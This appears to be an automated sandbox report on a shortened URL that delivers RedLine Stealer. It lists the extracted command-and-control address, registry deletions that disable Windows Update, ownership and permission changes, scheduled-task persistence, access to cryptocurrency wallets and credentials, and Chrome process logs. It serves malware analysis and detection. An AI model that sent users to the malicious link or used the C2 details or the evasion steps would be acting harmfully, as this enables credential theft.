redline | hxxp://gg[.]gg/10yg8h

Analysis

max time kernel
127s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-05-2022 20:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://gg.gg/10yg8h

Score

10^/10

redline discovery evasion exploit infostealer spyware suricata

Malware Config

Extracted

Family

redline

91.243.59.131:7171

Attributes

auth_value
96d69279c8f3c20c9b0e295e5a3be546

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5264-136-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

Loader.exeWindowsDefender.exeservices.exe

pid process

1928 Loader.exe
6000 WindowsDefender.exe
2568 services.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exetakeown.exe

pid process

1876 takeown.exe
8 icacls.exe
3292 icacls.exe
3400 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exetakeown.exe

pid process

8 icacls.exe
3292 icacls.exe
3400 takeown.exe
1876 takeown.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1928	Loader.exe
6000	WindowsDefender.exe
2568	services.exe

pid	process
1876	takeown.exe
8	icacls.exe
3292	icacls.exe
3400	takeown.exe

pid	process
8	icacls.exe
3292	icacls.exe
3400	takeown.exe
1876	takeown.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Loader.execonhost.exe

description	pid	process	target process
PID 1928 set thread context of 5264	1928	Loader.exe	AppLaunch.exe
PID 3952 set thread context of 5116	3952	conhost.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Program Files\Windows\services.exe	conhost.exe
File opened for modification	C:\Program Files\Windows\services.exe	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2040 schtasks.exe

pid	process
2040	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 51 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe

Modifies registry class 2 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2632097139-1792035885-811742494-1000\{681DB1DB-BAE7-40E0-892B-053C6D532A7F}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	chrome.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
6108	reg.exe
3780	reg.exe
5228	reg.exe
3992	reg.exe
5084	reg.exe
3780	reg.exe
5136	reg.exe
4920	reg.exe
3684	reg.exe
2268	reg.exe
5220	reg.exe
5900	reg.exe
5952	reg.exe
5060	reg.exe
5320	reg.exe
3992	reg.exe
4288	reg.exe
4992	reg.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe7zFM.exechrome.exeAppLaunch.exepowershell.execonhost.exepowershell.execonhost.exechrome.exe

pid	process
3856	chrome.exe
3856	chrome.exe
2768	chrome.exe
2768	chrome.exe
5008	chrome.exe
5008	chrome.exe
4916	chrome.exe
4916	chrome.exe
5240	chrome.exe
5240	chrome.exe
5248	chrome.exe
5248	chrome.exe
5492	chrome.exe
5492	chrome.exe
6132	chrome.exe
6132	chrome.exe
6112	7zFM.exe
6112	7zFM.exe
2768	chrome.exe
2768	chrome.exe
2792	chrome.exe
2792	chrome.exe
5264	AppLaunch.exe
5264	AppLaunch.exe
6112	7zFM.exe
6112	7zFM.exe
6112	7zFM.exe
6112	7zFM.exe
5492	powershell.exe
5492	powershell.exe
5492	powershell.exe
632	conhost.exe
632	conhost.exe
6112	7zFM.exe
6112	7zFM.exe
6112	7zFM.exe
6112	7zFM.exe
6112	7zFM.exe
6112	7zFM.exe
5968	powershell.exe
5968	powershell.exe
5968	powershell.exe
3952	conhost.exe
3952	conhost.exe
5476	chrome.exe
5476	chrome.exe
5476	chrome.exe
5476	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

6112 7zFM.exe

pid	process
6112	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 37 IoCs

Processes:

chrome.exe

pid	process
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

7zFM.exeAppLaunch.exepowershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exe

description	pid	process
Token: SeRestorePrivilege	6112	7zFM.exe
Token: 35	6112	7zFM.exe
Token: SeSecurityPrivilege	6112	7zFM.exe
Token: SeDebugPrivilege	5264	AppLaunch.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: SeDebugPrivilege	632	conhost.exe
Token: SeTakeOwnershipPrivilege	1876	takeown.exe
Token: SeDebugPrivilege	5968	powershell.exe
Token: SeDebugPrivilege	3952	conhost.exe
Token: SeTakeOwnershipPrivilege	3400	takeown.exe

Suspicious use of FindShellTrayWindow 40 IoCs

Processes:

chrome.exe7zFM.exe

pid	process
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
6112	7zFM.exe
6112	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2768 wrote to memory of 2400	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 2400	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1480	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 3856	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 3856	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe
PID 2768 wrote to memory of 1484	2768	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://gg.gg/10yg8h
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f9d04f50,0x7ff9f9d04f60,0x7ff9f9d04f70
2⤵
PID:2400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:2
2⤵
PID:1480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2040 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2280 /prefetch:8
2⤵
PID:1484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:1
2⤵
PID:3340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
2⤵
PID:1928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:8
2⤵
PID:2552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1
2⤵
PID:1488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4716 /prefetch:8
2⤵
PID:3188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3672 /prefetch:8
2⤵
- Modifies registry class
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
2⤵
PID:4084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
2⤵
PID:4472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
2⤵
PID:4464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
2⤵
PID:4456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
2⤵
PID:4648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
2⤵
PID:4640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
2⤵
PID:4656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
2⤵
PID:4764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:8
2⤵
PID:4936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6504 /prefetch:8
2⤵
PID:4944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6616 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6800 /prefetch:8
2⤵
PID:5024

C:\Program Files\Google\Chrome\Application\chrome.exe
